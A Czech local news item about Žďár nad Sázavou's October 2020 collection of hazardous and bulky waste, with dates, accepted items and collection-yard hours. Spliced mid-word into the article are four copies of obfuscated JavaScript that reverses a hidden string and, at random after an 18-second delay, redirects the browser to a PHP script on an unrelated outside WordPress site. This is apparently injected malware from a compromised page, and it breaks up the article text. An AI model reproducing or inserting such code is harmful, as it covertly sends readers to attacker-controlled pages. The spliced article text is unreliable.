Rainbow page separator

V říjnu ve Žďáře proběhne svoz nebezpečného i objemného odpadu

Úterý, 29. září 2020

Sběr odpadu

Žďár nad Sázavou / Každoroční podzimní úklid se v době od 8. do 24. října uskuteční ve žďárských ulicích. Jeho první částí bude svoz nebezpečného odpadu, který je naplánovaný od 8. do 10. října - podrobnosti mobilního svozu včetně časového harmonogramu upřesňuje web žďárské radnice. Při něm mohou lidé odložit odpady s nebezpečnými vlastnostmi, jako jsou například rádia, televizory, ledničky, plechovky, nádoby od barev, laků, ředidel, zářivky, monočlánky, akumulá["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory a jiné obaly znečištěné škodlivinami. Elektrospotřebiče, které už dosloužily, ale jsou stále kompletní, jsou odevzdávány zdarma ve zpětném odběru k dalšímu využití. Nekompletní elektrospotřebiče musí být zlikvidovány na skládce nebezpečného odpadu. Po ukončení mobilního svozu je možné ukládat nebezpečné a všechny další odpady ve sběrném dvoře v Jihlavské ulici, a ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to vždy od pondělí do pátku od 6 do 17 hodin a v sobotu od 7 do 13 hodin. Od 12. do 24. října najdou lidé v rámci podzimního úklidu města na obvyklých místech velkoobjemové kontejnery na objemný odpad a na odpad ze zeleně. Objemný odpad poputuje na skládku komunálního odpadu do Ronova a odpad ze zeleně bude zpracován ve žďárské bioplynové stanici.